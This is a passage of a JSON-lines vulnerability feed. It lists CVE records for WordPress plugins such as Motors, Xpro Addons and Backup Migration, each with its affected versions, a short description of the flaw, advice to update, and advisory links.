emo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L627\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L627\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L541\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L541\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10802","slug":"hash-elements","versionImpact":"1.4.7","versionEndExcluding":"1.4.8","description":"The Hash Elements plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the hash_elements_get_posts_title_by_id() function in all versions up to, and including, 1.4.7. This makes it possible for unauthenticated attackers to retrieve draft post titles that should not be accessible to unauthenticated users.","recommendation":"Update to version 1.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/010590bc-98fb-4afe-9c5e-80ad4c50a34e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/010590bc-98fb-4afe-9c5e-80ad4c50a34e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186151%40hash-elements&new=3186151%40hash-elements&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186151%40hash-elements&new=3186151%40hash-elements&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6279","slug":"woostify-sites-library","versionEndExcluding":"1.4.8","description":"The Woostify Sites Library WordPress plugin before 1.4.8 does not have authorisation in an AJAX action, allowing any authenticated users, such as subscriber to update arbitrary blog options and set them to 'activated' which could lead to DoS when using a specific option name","recommendation":"Update to version 1.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/626bbc7d-0d0f-4418-ac61-666278a1cbdb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/626bbc7d-0d0f-4418-ac61-666278a1cbdb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13216","slug":"ht-event","versionImpact":"1.4.7","versionEndExcluding":"1.4.8","description":"The HT Event \u2013 WordPress Event Manager Plugin for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.7 via the 'render' function in \/includes\/widgets\/htevent_sponsor.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, scheduled, and draft template data.","recommendation":"Update to version 1.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-event\\\/trunk\\\/includes\\\/widgets\\\/htevent_sponsor.php#L443\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-event\\\/trunk\\\/includes\\\/widgets\\\/htevent_sponsor.php#L443\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/155f494b-be25-4269-9d3b-379309619bbe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/155f494b-be25-4269-9d3b-379309619bbe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12395","slug":"woo-additional-fees-on-checkout-wordpress","versionImpact":"1.4.7","versionEndExcluding":"1.4.8","description":"The WooCommerce Additional Fees On Checkout (Free) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018number\u2019 parameter in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L117\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L138\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L200\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-additional-fees-on-checkout-wordpress\\\/trunk\\\/classes\\\/wps-ext-cst-admin.php#L96\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208205\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208205\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b09dc4dc-d2b9-452a-b005-b69feffdbecf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b09dc4dc-d2b9-452a-b005-b69feffdbecf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10329","slug":"ultimate-bootstrap-elements-for-elementor","versionImpact":"1.4.6","versionEndExcluding":"1.4.7","description":"The Ultimate Bootstrap Elements for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.6 via the 'ube_get_page_templates' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including the contents of templates that are private.","recommendation":"Update to version 1.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3af83ec2-9ebb-4cca-8523-8fe9b1517825?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3af83ec2-9ebb-4cca-8523-8fe9b1517825?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-bootstrap-elements-for-elementor\\\/trunk\\\/inc\\\/functions\\\/core.php#L239\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-bootstrap-elements-for-elementor\\\/trunk\\\/inc\\\/functions\\\/core.php#L239\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176562\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176562\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13116","slug":"crelly-slider","versionImpact":"1.4.5","versionEndExcluding":"1.4.7","description":"The Crelly Slider WordPress plugin before 1.4.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1755c8ad-7620-4b12-bba0-013e80c2691b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1755c8ad-7620-4b12-bba0-013e80c2691b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3437","slug":"motors-car-dealership-classified-listings","versionImpact":"1.4.66","versionEndExcluding":"1.4.67","description":"The Motors \u2013 Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in the ajax_actions.php file in all versions up to, and including, 1.4.66. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute several initial set-up actions.","recommendation":"Update to version 1.4.67, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267930%40motors-car-dealership-classified-listings&new=3267930%40motors-car-dealership-classified-listings&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267930%40motors-car-dealership-classified-listings&new=3267930%40motors-car-dealership-classified-listings&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267930%40motors-car-dealership-classified-listings&new=3267930%40motors-car-dealership-classified-listings&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267930%40motors-car-dealership-classified-listings&new=3267930%40motors-car-dealership-classified-listings&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0af6050-8602-4ed3-b017-c10aa023849b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0af6050-8602-4ed3-b017-c10aa023849b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2807","slug":"motors-car-dealership-classified-listings","versionImpact":"1.4.64","versionEndExcluding":"1.4.65","description":"The Motors \u2013 Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to arbitrary plugin installations due to a missing capability check in the mvl_setup_wizard_install_plugin() function in all versions up to, and including, 1.4.64. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install and activate arbitrary plugins on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.4.65, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262748\\\/motors-car-dealership-classified-listings\\\/trunk\\\/includes\\\/admin\\\/setup-wizard\\\/includes\\\/ajax_actions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262748\\\/motors-car-dealership-classified-listings\\\/trunk\\\/includes\\\/admin\\\/setup-wizard\\\/includes\\\/ajax_actions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/733f7666-468a-455c-a953-3d8946940f13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/733f7666-468a-455c-a953-3d8946940f13?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2808","slug":"motors-car-dealership-classified-listings","versionImpact":"1.4.63","versionEndExcluding":"1.4.64","description":"The Motors \u2013 Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Phone Number parameter in all versions up to, and including, 1.4.63 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.64, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262748\\\/motors-car-dealership-classified-listings\\\/trunk\\\/includes\\\/actions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262748\\\/motors-car-dealership-classified-listings\\\/trunk\\\/includes\\\/actions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90e420be-fe6e-4a35-9c06-f0d360c9f9bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90e420be-fe6e-4a35-9c06-f0d360c9f9bf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13649","slug":"xpro-elementor-addons","versionImpact":"1.4.6.7","versionEndExcluding":"1.4.6.8","description":"The 140+ Widgets | Xpro Addons For Elementor \u2013 FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets in all versions up to, and including, 1.4.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235058%40xpro-elementor-addons&new=3235058%40xpro-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235058%40xpro-elementor-addons&new=3235058%40xpro-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3248584%40xpro-elementor-addons&new=3248584%40xpro-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3248584%40xpro-elementor-addons&new=3248584%40xpro-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43192613-ce5b-4acc-b284-f40cad7cb8df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43192613-ce5b-4acc-b284-f40cad7cb8df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12584","slug":"xpro-elementor-addons","versionImpact":"1.4.6.2","versionEndExcluding":"1.4.6.3","description":"The 140+ Widgets | Xpro Addons For Elementor \u2013 FREE plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.6.2 via the 'duplicate' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract potentially sensitive data from draft, scheduled (future), private, and password protected posts.","recommendation":"Update to version 1.4.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212531\\\/xpro-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212531\\\/xpro-elementor-addons\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa085bc0-af0b-4797-a10f-4d41b4988c02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa085bc0-af0b-4797-a10f-4d41b4988c02?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10319","slug":"xpro-elementor-addons","versionImpact":"1.4.6","versionEndExcluding":"1.4.6.1","description":"The 140+ Widgets | Xpro Addons For Elementor \u2013 FREE plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.6 via the render function in widgets\/content-toggle\/layout\/frontend.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 1.4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/382a46c2-9fec-4642-93b0-c06b9ed1c086?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/382a46c2-9fec-4642-93b0-c06b9ed1c086?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179221\\\/xpro-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179221\\\/xpro-elementor-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10932","slug":"backup-backup","versionImpact":"1.4.6","versionEndExcluding":"1.4.6.1","description":"The Backup Migration plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.6 via deserialization of untrusted input in the 'recursive_unserialize_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files, retrieve sensitive data, or execute code. An administrator must create a staging site in order to trigger the exploit.","recommendation":"Update to version 1.4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/\\\/backup-backup\\\/tags\\\/1.4.6\\\/includes\\\/database\\\/search-replace.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/\\\/backup-backup\\\/tags\\\/1.4.6\\\/includes\\\/database\\\/search-replace.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.4.6.1\\\/includes\\\/database\\\/search-replace.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.4.6.1\\\/includes\\\/database\\\/search-replace.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5a0c514-5200-47f4-9d2e-684d68946b9a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5a0c514-5200-47f4-9d2e-684d68946b9a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0496","slug":"ht-event","versionEndExcluding":"1.4.6","description":"The HT Event WordPress plugin before 1.4.6 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/451b47d5-7bd2-4a82-9c8e-fe6601bcd2ab\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/451b47d5-7bd2-4a82-9c8e-fe6601bcd2ab\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6579","slug":"vc-addons-by-bit14","versionImpact":"1.4.5","versionEndExcluding":"1.4.6","description":"The Web and WooCommerce Addons for WPBakery Builder plugin for WordPress is vulnerable to unauthorized plugin settings modification due to a missing capability check on several plugin functions in all versions up to, and including, 1.4.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change some of the plugin settings.","recommendation":"Update to version 1.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/746b77c9-64f8-43e8-9c2a-ce6bc35fd24c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/746b77c9-64f8-43e8-9c2a-ce6bc35fd24c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vc-addons-by-bit14\\\/tags\\\/1.4.5\\\/bit14-vc-addons.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vc-addons-by-bit14\\\/tags\\\/1.4.5\\\/bit14-vc-addons.php#L102\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vc-addons-by-bit14\\\/tags\\\/1.4.5\\\/bit14-vc-addons.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vc-addons-by-bit14\\\/tags\\\/1.4.5\\\/bit14-vc-addons.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vc-addons-by-bit14\\\/tags\\\/1.4.5\\\/bit14-vc-addons.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vc-addons-by-bit14\\\/tags\\\/1.4.5\\\/bit14-vc-addons.php#L125\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13737","slug":"motors-car-dealership-classified-listings","versionImpact":"1.4.57","versionEndExcluding":"1.4.58","description":"The Motors \u2013 Car Dealer, Classifieds & Listing plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the motors_create_template and motors_delete_template functions in all versions up to, and including, 1.4.57. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts or create listing templates. This issue requires the Elementor plugin to be installed, which is a required plugin for Motors Starter Theme.","recommendation":"Update to version 1.4.58, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motors-car-dealership-classified-listings\\\/tags\\\/1.4.52\\\/includes\\\/class\\\/Features\\\/Elementor\\\/Nuxy\\\/TemplateManager.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motors-car-dealership-classified-listings\\\/tags\\\/1.4.52\\\/includes\\\/class\\\/Features\\\/Elementor\\\/Nuxy\\\/TemplateManager.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motors-car-dealership-classified-listings\\\/tags\\\/1.4.52\\\/includes\\\/class\\\/Features\\\/Elementor\\\/Nuxy\\\/TemplateManager.php#L191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motors-car-dealership-classified-listings\\\/tags\\\/1.4.52\\\/includes\\\/class\\\/Features\\\/Elementor\\\/Nuxy\\\/TemplateManager.php#L191\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250931\\\/motors-car-dealership-classified-listings\\\/trunk\\\/includes\\\/class\\\/Features\\\/Elementor\\\/Nuxy\\\/TemplateManager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250931\\\/motors-car-dealership-classified-listings\\\/trunk\\\/includes\\\/class\\\/Features\\\/Elementor\\\/Nuxy\\\/TemplateManager.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04fd2d7a-fa75-4b9d-9514-5c24ca5ebc22?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04fd2d7a-fa75-4b9d-9514-5c24ca5ebc22?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
